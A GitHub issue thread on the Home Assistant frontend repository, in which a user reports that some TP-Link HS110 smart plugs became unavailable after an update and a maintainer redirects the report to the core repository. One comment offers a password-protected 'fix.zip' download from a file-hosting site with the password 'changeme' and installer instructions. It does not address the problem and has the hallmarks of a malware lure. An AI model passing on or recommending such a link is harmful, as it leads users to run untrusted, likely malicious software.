### ISSUE TITLE
After last update i lost connection with 30% of tp-link smart power plug  

### ISSUE THREAD

**Issue by polandia12** [home-assistant/frontend#21815]
### Checklist

- [X] I have updated to the latest available Home Assistant version.
- [X] I have cleared the cache of my browser.
- [X] I have tried a different browser to see if it is related to my browser.
- [X] I have tried reproducing the issue in [safe mode](https://www.home-assistant.io/blog/2023/11/01/release-202311/#restarting-into-safe-mode) to rule out problems with unsupported custom resources.

### Describe the issue you are experiencing

After last update i can not control of 30% tp-link hs 110. Its grey in dashboard
![Zrzut ekranu 2024-08-28 080714](https://github.com/user-attachments/assets/d0249629-faa4-43f5-a440-b02223a142fa)
 its changed a name of one smart plug to name that i used before like 4 months ago.

All smart power plug what i have in company are tp-link hs110

### Describe the behavior you expected

all working great again.

### Steps to reproduce the issue

1.I did update core hs software
2. its stop working for 30% of all smart plugs but the best is that  its normally working by mobile android app so its definetely something wrong with home assisistant
3.
...

### What version of Home Assistant Core has the issue?

Core 2024.8.3 Supervisor 2024.08.0 Operating System 13.1 Interfejs użytkownika 20240809.0

### Which operating system are you using to run this browser?

Windows 11 PRO

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by karwosts** [comment]
Unavailable entities have nothing to do with frontend, this should be reported in home-assistant/core.
